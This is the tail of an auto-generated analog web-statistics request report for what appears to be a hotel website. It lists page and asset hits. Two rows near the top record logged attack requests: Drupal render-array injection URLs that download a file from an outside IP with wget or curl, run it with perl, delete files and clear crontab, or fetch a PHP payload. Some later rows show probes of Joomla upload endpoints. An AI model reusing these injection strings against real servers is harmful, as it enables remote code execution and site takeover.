<tr class="sub level2"><td class="R">11</td><td class="b"> 0.02%</td><td class="D">Sep/27/18  4:51 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23markup%5D=%20cd%20/tmp/%20;%20wget%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20fetch%20http://31.184.195.89/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.89/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20crontab%20-r&amp;name%5B%23type%5D=markup">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#markup]= cd /tmp/ ; wget http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; fetch http://31.184.195.89/index.log.2018.06.26 ; lwp-download http://31.184.195.89/index.log.2018.06.26 ; curl -O http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; crontab -r&amp;name[#type]=markup</a></td></tr>
<tr class="sub level2"><td class="R">10</td><td class="b"> 0.02%</td><td class="D">May/18/18  6:29 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23type%5D=markup&amp;name%5B%23markup%5D=wget+https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#type]=markup&amp;name[#markup]=wget+https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php</a></td></tr>
<tr><td class="R">1060</td><td class="b"> 0.76%</td><td class="D">Nov/30/18  1:27 PM</td><td class="xl">/assets/js/misc/drupal.js</td></tr>
<tr class="sub level2"><td class="R">1039</td><td class="b"> 0.74%</td><td class="D">Nov/12/18  3:37 PM</td><td class="xl">&nbsp;&nbsp;/assets/js/misc/drupal.js?nsbnfj</td></tr>
<tr><td class="R">861</td><td class="b"> 1.93%</td><td class="D">Nov/30/18 10:25 AM</td><td class="xl">/contact-us</td></tr>
<tr><td class="R">775</td><td class="b"> 0.38%</td><td class="D">Nov/30/18  6:24 AM</td><td class="xl">/assets/js/modernizr.min.js</td></tr>
<tr><td class="R">768</td><td class="b"> 0.01%</td><td class="D">Nov/30/18  6:24 AM</td><td class="xl">/assets/js/lazyloadxt.bg.min.js</td></tr>
<tr><td class="R">758</td><td class="b"> 1.09%</td><td class="D">Nov/29/18 10:36 AM</td><td class="xl">/assets/js/bootstrap.min.js</td></tr>
<tr><td class="R">757</td><td class="b"> 0.87%</td><td class="D">Nov/30/18  1:27 PM</td><td class="xl">/assets/js/jquery.nivo.slider.js</td></tr>
<tr><td class="R">755</td><td class="b"> 0.05%</td><td class="D">Nov/30/18  1:27 PM</td><td class="xl">/assets/js/responsive_navigation_ellens.js</td></tr>
<tr><td class="R">753</td><td class="b"> 0.31%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/img/logo_main.png</td></tr>
<tr><td class="R">744</td><td class="b"> 0.40%</td><td class="D">Nov/30/18  4:53 PM</td><td class="xl">/assets/js/scripts.js</td></tr>
<tr><td class="R">744</td><td class="b"> 0.07%</td><td class="D">Nov/30/18  7:16 AM</td><td class="xl">/assets/js/lazyloadxt.min.js</td></tr>
<tr><td class="R">744</td><td class="b"> 0.71%</td><td class="D">Nov/29/18 10:36 AM</td><td class="xl">/assets/js/owl.carousel.min.js</td></tr>
<tr><td class="R">743</td><td class="b"> 2.93%</td><td class="D">Nov/29/18 10:36 AM</td><td class="xl">/assets/js/jquery-1.11.2.min.js</td></tr>
<tr><td class="R">742</td><td class="b"> 0.16%</td><td class="D">Nov/30/18  6:24 AM</td><td class="xl">/assets/js/jquery.bootstrap.newsbox.min.js</td></tr>
<tr><td class="R">740</td><td class="b">13.69%</td><td class="D">Nov/30/18  1:27 PM</td><td class="xl">/assets/js/jquery-ui.js</td></tr>
<tr><td class="R">727</td><td class="b"> 0.22%</td><td class="D">Nov/30/18  6:24 AM</td><td class="xl">/assets/js/cssmin.js</td></tr>
<tr><td class="R">604</td><td class="b"> 0.10%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/css/styles.css</td></tr>
<tr><td class="R">604</td><td class="b"> 0.05%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/owl-carousel/owl.carousel.css</td></tr>
<tr><td class="R">596</td><td class="b"> 3.06%</td><td class="D">Nov/29/18 11:16 AM</td><td class="xl">/assets/css/ellens_main.css</td></tr>
<tr><td class="R">586</td><td class="b"> 0.06%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/owl-carousel/owl.theme.css</td></tr>
<tr><td class="R">579</td><td class="b"> 1.19%</td><td class="D">Nov/29/18  2:18 AM</td><td class="xl">/gallery</td></tr>
<tr><td class="R">579</td><td class="b"> 0.03%</td><td class="D">Nov/30/18  1:18 PM</td><td class="xl">/assets/css/fonts.css</td></tr>
<tr><td class="R">575</td><td class="b"> 0.11%</td><td class="D">Nov/29/18  2:18 AM</td><td class="xl">/assets/css/accordian.css</td></tr>
<tr><td class="R">565</td><td class="b"> 0.23%</td><td class="D">Nov/29/18  9:51 AM</td><td class="xl">/assets/css/magnific-popup.css</td></tr>
<tr><td class="R">563</td><td class="b"> 0.61%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/css/responsive.css</td></tr>
<tr><td class="R">539</td><td class="b"> 0.96%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/css/jquery-ui.css</td></tr>
<tr><td class="R">481</td><td class="b"> 3.68%</td><td class="D">Nov/30/18  2:11 AM</td><td class="xl">/assets/images/trip-advisor-ellens.png</td></tr>
<tr><td class="R">431</td><td class="b"> 0.08%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/img/cls.png</td></tr>
<tr><td class="R">430</td><td class="b"> 0.01%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/img/icon.png</td></tr>
<tr><td class="R">430</td><td class="b"> 0.55%</td><td class="D">Nov/29/18  4:01 PM</td><td class="xl">/about-us</td></tr>
<tr><td class="R">421</td><td class="b"> 3.70%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/images/retreats.jpg</td></tr>
<tr><td class="R">421</td><td class="b"> 0.21%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/img/logo_elp.jpg</td></tr>
<tr><td class="R">408</td><td class="b"> 3.93%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/images/getting.jpg</td></tr>
<tr><td class="R">402</td><td class="b"> 0.89%</td><td class="D">Nov/29/18  5:23 PM</td><td class="xl">/contact-us.php</td></tr>
<tr><td class="R">400</td><td class="b"> 1.28%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/images/suites.jpg</td></tr>
<tr><td class="R">398</td><td class="b"> 2.52%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/images/pool.jpg</td></tr>
<tr><td class="R">394</td><td class="b"> 0.61%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/images/generations.jpg</td></tr>
<tr><td class="R">387</td><td class="b"> 0.34%</td><td class="D">Nov/29/18  2:26 PM</td><td class="xl">/assets/img/favicon.ico</td></tr>
<tr><td class="R">347</td><td class="b"> 0.44%</td><td class="D">Nov/29/18  4:01 PM</td><td class="xl">/location</td></tr>
<tr><td class="R">331</td><td class="b"> 8.73%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/images/sliders/sl7.jpg</td></tr>
<tr><td class="R">330</td><td class="b"> 0.46%</td><td class="D">Nov/28/18  6:02 PM</td><td class="xl">/accommodation/standard-rooms</td></tr>
<tr><td class="R">322</td><td class="b"> 4.17%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/images/sliders/sl8.jpg</td></tr>
<tr><td class="R">309</td><td class="b"> 0.48%</td><td class="D">Nov/30/18  1:29 PM</td><td class="xl">/accommodation</td></tr>
<tr><td class="R">309</td><td class="b"> 0.04%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/img/rght_arrow.png</td></tr>
<tr><td class="R">308</td><td class="b"> 3.79%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/images/sliders/sl1.jpg</td></tr>
<tr><td class="R">291</td><td class="b"> 0.40%</td><td class="D">Nov/29/18 11:42 PM</td><td class="xl">/accommodation/deluxe-rooms</td></tr>
<tr><td class="R">288</td><td class="b"> 0.51%</td><td class="D">Nov/29/18 10:56 PM</td><td class="xl">/index.php</td></tr>
<tr class="sub level2"><td class="R">25</td><td class="b"> 0.05%</td><td class="D">Nov/ 8/18  1:10 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_jce&amp;task=plugin&amp;plugin=imgmanager&amp;file=imgmanager&amp;method=form</td></tr>
<tr class="sub level2"><td class="R">14</td><td class="b"> 0.03%</td><td class="D">Nov/21/18  8:08 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_adsmanager&amp;task=upload&amp;tmpl=component</td></tr>
<tr class="sub level2"><td class="R">14</td><td class="b"> 0.03%</td><td class="D">Nov/21/18  8:06 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_jdownloads&amp;Itemid=0&amp;view=upload</td></tr>
<tr class="sub level2"><td class="R">11</td><td class="b"> 0.02%</td><td class="D">Nov/29/18 10:38 AM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_myblog&amp;task=ajaxupload</td></tr>
<tr><td class="R">282</td><td class="b"> 0.39%</td><td class="D">Nov/30/18  9:10 AM</td><td class="xl">/promotions</td></tr>
<tr><td class="R">277</td><td class="b"> 0.39%</td><td class="D">Nov/30/18 12:29 AM</td><td class="xl">/accommodation/super-deluxe-rooms</td></tr>
<tr><td class="R">250</td><td class="b"> 0.39%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/suites.php</td></tr>
<tr><td class="R">248</td><td class="b"> 0.33%</td><td class="D">Nov/30/18  2:13 PM</td><td class="xl">/facilities/restaurant</td></tr>
<tr><td class="R">234</td><td class="b"> 1.70%</td><td class="D">Nov/26/18  1:19 PM</td><td class="xl">/assets/js/jssor.slider.js</td></tr>
<tr><td class="R">227</td><td class="b"> 0.87%</td><td class="D">Nov/26/18  1:19 PM</td><td class="xl">/assets/js/jssor.js</td></tr>
<tr><td class="R">226</td><td class="b"> 0.33%</td><td class="D">Nov/30/18  9:47 AM</td><td class="xl">/facilities</td></tr>
<tr><td class="R">221</td><td class="b"> 0.20%</td><td class="D">Nov/29/18  8:17 AM</td><td class="xl">/assets/js/jquery.magnific-popup.min.js</td></tr>
<tr><td class="R">207</td><td class="b"> 0.30%</td><td class="D">Nov/29/18 11:53 PM</td><td class="xl">/swimming-pool.php</td></tr>
<tr><td class="R">202</td><td class="b"> 0.28%</td><td class="D">Nov/29/18  9:41 PM</td><td class="xl">/promotions.php</td></tr>
<tr><td class="R">199</td><td class="b"> 0.26%</td><td class="D">Nov/30/18  3:28 PM</td><td class="xl">/facilities/swimming-pool</td></tr>
<tr><td class="R">192</td><td class="b"> 0.02%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/img/loading.gif</td></tr>
<tr><td class="R">192</td><td class="b">&nbsp;</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/img/list-bullet-common.png</td></tr>
<tr><td class="R">171</td><td class="b"> 0.27%</td><td class="D">Nov/30/18  6:07 AM</td><td class="xl">/accommodation.php</td></tr>
<tr><td class="R">170</td><td class="b"> 0.26%</td><td class="D">Nov/25/18  9:43 AM</td><td class="xl">/privacy-policy</td></tr>
<tr><td class="R">169</td><td class="b"> 0.26%</td><td class="D">Nov/28/18  6:01 PM</td><td class="xl">/assets/img/ellens_payment_methods.png</td></tr>
<tr><td class="R">161</td><td class="b"> 0.25%</td><td class="D">Nov/24/18 10:39 PM</td><td class="xl">/terms-and-conditions</td></tr>
<tr><td class="R">154</td><td class="b"> 0.29%</td><td class="D">Nov/21/18 10:36 AM</td><td class="xl">/assets/images/cont-us.jpg</td></tr>
<tr><td class="R">151</td><td class="b"> 0.04%</td><td class="D">Nov/26/18  1:19 PM</td><td class="xl">/assets/img/a11.png</td></tr>
<tr><td class="R">148</td><td class="b"> 0.01%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/img/arrows.png</td></tr>
<tr><td class="R">145</td><td class="b"> 0.30%</td><td class="D">Nov/29/18  2:17 PM</td><td class="xl">/gallery.php</td></tr>
<tr><td class="R">135</td><td class="b"> 0.18%</td><td class="D">Nov/26/18 11:59 AM</td><td class="xl">/about-us.php</td></tr>
<tr><td class="R">133</td><td class="b"> 0.14%</td><td class="D">Nov/25/18  4:50 AM</td><td class="xl">/assets/img/contact-details.png</td></tr>
<tr><td class="R">129</td><td class="b"> 0.19%</td><td class="D">Nov/30/18  2:10 AM</td><td class="xl">/facilities.php</td></tr>
<tr><td class="R">121</td><td class="b"> 0.11%</td><td class="D">Nov/28/18  6:02 PM</td><td class="xl">/assets/img/cal_rght.png</td></tr>
<tr><td class="R">121</td><td class="b"> 0.18%</td><td class="D">Nov/29/18 12:42 AM</td><td class="xl">/restaurant.php</td></tr>
<tr><td class="R">103</td><td class="b"> 0.19%</td><td class="D">May/ 1/18  2:45 PM</td><td class="xl">/ipms247.php</td></tr>
<tr><td class="R">102</td><td class="b"> 0.16%</td><td class="D">Nov/28/18 11:58 PM</td><td class="xl">/deluxe_rooms.php</td></tr>
<tr><td class="R">101</td><td class="b"> 0.09%</td><td class="D">Nov/28/18  6:02 PM</td><td class="xl">/assets/img/cal_lft.png</td></tr>
<tr><td class="R">92</td><td class="b"> 0.15%</td><td class="D">Nov/30/18 12:19 PM</td><td class="xl">/standard_rooms.php</td></tr>
<tr><td class="R">92</td><td class="b"> 0.12%</td><td class="D">Nov/29/18 10:15 AM</td><td class="xl">/location.php</td></tr>
<tr><td class="R">90</td><td class="b"> 0.14%</td><td class="D">Nov/30/18 12:36 PM</td><td class="xl">/privacy-policy.php</td></tr>
<tr><td class="R">84</td><td class="b"> 0.11%</td><td class="D">Jul/11/18  7:33 AM</td><td class="xl">/downloads</td></tr>
<tr><td class="R">84</td><td class="b"> 0.26%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/images/acc/inner_suites/5.jpg</td></tr>
<tr><td class="R">80</td><td class="b"> 0.39%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/images/acc/inner_suites/1.jpg</td></tr>
<tr><td class="R">80</td><td class="b"> 0.01%</td><td class="D">Nov/16/18  8:56 PM</td><td class="xl">/sitemap.xml</td></tr>
<tr><td class="R">76</td><td class="b"> 0.31%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/images/acc/inner_suites/4.jpg</td></tr>
<tr><td class="R">76</td><td class="b"> 0.26%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/images/acc/inner_suites/6.jpg</td></tr>
<tr><td class="R">76</td><td class="b"> 0.24%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/images/acc/inner_suites/7.jpg</td></tr>
<tr><td class="R">74</td><td class="b"> 0.28%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/images/acc/inner_suites/2.jpg</td></tr>
<tr><td class="R">74</td><td class="b"> 0.29%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/images/acc/inner_suites/3.jpg</td></tr>
<tr><td class="R">71</td><td class="b"> 0.30%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/images/acc/inner_suites/8.jpg</td></tr>
<tr><td class="R">68</td><td class="b"> 0.11%</td><td class="D">Nov/30/18  1:25 AM</td><td class="xl">/terms-and-conditions.php</td></tr>
<tr><td class="R">66</td><td class="b"> 0.30%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/images/acc/suites_slider3.jpg</td></tr>
<tr><td class="R">64</td><td class="b"> 0.29%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/images/acc/suites_slider2.jpg</td></tr>
<tr><td class="R">64</td><td class="b"> 0.33%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/images/acc/suites_slider4.jpg</td></tr>
<tr><td class="R">63</td><td class="b"> 0.38%</td><td class="D">Nov/29/18  5:49 PM</td><td class="xl">/assets/images/acc/suites_slider1.jpg</td></tr>
<tr><td class="R">58</td><td class="b"> 0.36%</td><td class="D">Nov/28/18  2:37 AM</td><td class="xl">/assets/images/facilities/pool/pool-3.jpg</td></tr>
<tr><td class="R">51</td><td class="b"> 0.26%</td><td class="D">Nov/14/18 11:14 AM</td><td class="xl">/assets/images/facilities/pool/pool-2.jpg</td></tr>
<tr><td class="R">48</td><td class="b"> 0.07%</td><td class="D">Nov/28/18  4:03 PM</td><td class="xl">/last-minute.php</td></tr>
<tr><td class="R">48</td><td class="b"> 0.29%</td><td class="D">Nov/22/18  6:24 PM</td><td class="xl">/assets/images/facilities/pool/pool-1.jpg</td></tr>
<tr><td class="R">46</td><td class="b">&nbsp;</td><td class="D">Nov/ 3/18 11:41 PM</td><td class="xl">/assets/owl-carousel/grabbing.png</td></tr>
<tr><td class="R">46</td><td class="b"> 0.06%</td><td class="D">Apr/ 5/18 11:11 AM</td><td class="xl">/accommodation/suites</td></tr>
<tr><td class="R">42</td><td class="b"> 0.26%</td><td class="D">Nov/26/18 10:24 PM</td><td class="xl">/assets/images/facilities/pool/pool-4.jpg</td></tr>
<tr><td class="R">41</td><td class="b"> 0.06%</td><td class="D">Jul/ 8/18 10:15 AM</td><td class="xl">/downloads.php</td></tr>
<tr><td class="R">39</td><td class="b"> 0.31%</td><td class="D">Nov/14/18 11:14 AM</td><td class="xl">/assets/images/facilities/pool/pool_slider4.jpg</td></tr>
<tr><td class="R">38</td><td class="b"> 0.26%</td><td class="D">Nov/14/18 11:14 AM</td><td class="xl">/assets/images/facilities/pool/pool_slider3.jpg</td></tr>
<tr><td class="R">37</td><td class="b"> 0.23%</td><td class="D">Nov/14/18 11:14 AM</td><td class="xl">/assets/images/facilities/pool/pool_slider2.jpg</td></tr>
<tr><td class="R">36</td><td class="b"> 0.24%</td><td class="D">Nov/14/18 11:14 AM</td><td class="xl">/assets/images/facilities/pool/pool_slider1.jpg</td></tr>
<tr><td class="R">30</td><td class="b"> 0.07%</td><td class="D">Nov/22/18  8:51 PM</td><td class="xl"><a href="/contact-us/">/contact-us/</a></td></tr>
<tr><td class="R">397</td><td class="b"> 1.12%</td><td class="D">Nov/27/18 12:32 AM</td><td class="xl">[not listed: 63 files]</td></tr>
</tbody></table>
</div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>.
<br /><span class="runtimetitle">Running time:</span> Less than 1 second.
</p>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
</div>
</body>
</html>
